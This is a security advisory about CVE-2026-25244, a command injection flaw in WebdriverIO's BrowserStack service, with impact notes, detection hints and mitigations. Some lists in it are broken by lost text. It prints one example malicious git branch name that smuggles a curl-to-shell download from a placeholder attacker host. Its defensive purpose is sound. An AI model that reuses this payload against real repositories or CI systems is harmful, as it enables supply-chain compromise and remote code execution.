A critical command injection vulnerability, CVE-2026-25244, has been disclosed in WebdriverIO, a widely used open-source framework for automating web and mobile application testing. The flaw, which has been assigned a CVSS score of 9.8, resides in a service integration package for the BrowserStack testing cloud. It allows for arbitrary command execution by processing maliciously crafted git branch names. This vulnerability poses a severe risk to software development environments, as its exploitation could lead to the complete compromise of a developer's workstation or, more critically, a Continuous Integration/Continuous Delivery (CI/CD) build server, providing a powerful vector for a software supply chain attack.
CVE-2026-25244@wdio/browserstack-service@wdio/browserstack-service package processes a git branch name during test orchestration. An attacker can create a git branch with a name that includes shell commands (e.g., feature/new-button;$(curl -sL evil.com/payload.sh|sh)). When the vulnerable WebdriverIO service reads this branch name and uses it in a shell command without proper sanitization, the injected command is executed on the underlying system.Any project that uses the WebdriverIO framework along with the @wdio/browserstack-service package is potentially vulnerable. The vulnerability affects the machine where the WebdriverIO tests are executed, which could be:
As of the time of reporting, there is no evidence of active exploitation in the wild. However, given the simplicity of the exploit and the high-value targets (CI/CD systems), it is highly likely that threat actors will begin scanning for and attempting to exploit this vulnerability.
A successful exploit of CVE-2026-25244 could have devastating consequences. If exploited on a CI/CD server, an attacker could:
Compromise of a developer's machine is also critical, as it provides access to source code, credentials, and a trusted point from which to launch further attacks within the organization.
@wdio/browserstack-service package.curl, wget, or bash during the test phase.@wdio/browserstack-service package to a patched version. Developers should consult the WebdriverIO project's security advisories for the specific fixed version number.Platform Hardening (D3-PH) and Outbound Traffic Filtering (D3-OTF).The most direct mitigation is to update the affected @wdio/browserstack-service package to a patched version.
Running build jobs in ephemeral, isolated containers can limit the impact of a compromise, preventing attackers from gaining persistent access or moving laterally.
This vulnerability is a classic example of injection. Strict input validation and sanitization on any data that will be used in a shell command is a fundamental exploit protection technique.
The command injection vulnerability CVE-2026-25244 in WebdriverIO is publicly disclosed.

Cybersecurity professional with over 10 years of specialized experience in security operations, threat intelligence, incident response, and security automation. Expertise spans SOAR/XSOAR orchestration, threat intelligence platforms, SIEM/UEBA analytics, and building cyber fusion centers. Background includes technical enablement, solution architecture for enterprise and government clients, and implementing security automation workflows across IR, TIP, and SOC use cases.
Help others stay informed about cybersecurity threats
Every tactic, technique, and sub-technique used in this threat has been identified and mapped to the MITRE ATT&CK framework for consistent, actionable threat language.
Observables and indicators of compromise (IOCs) have been extracted and cataloged. Risk has been assessed and correlated with known threat actors and historical campaigns.
Detection rules, incident response steps, and D3FEND-aligned mitigation strategies are included so your team can act on this intelligence immediately.
Structured threat data is packaged as a STIX 2.1 bundle and can be visualized as an interactive graph — relationships between actors, malware, techniques, and indicators.
Sigma detection rules are derived from the threat techniques in this article and can be converted for deployment across any major SIEM or EDR platform.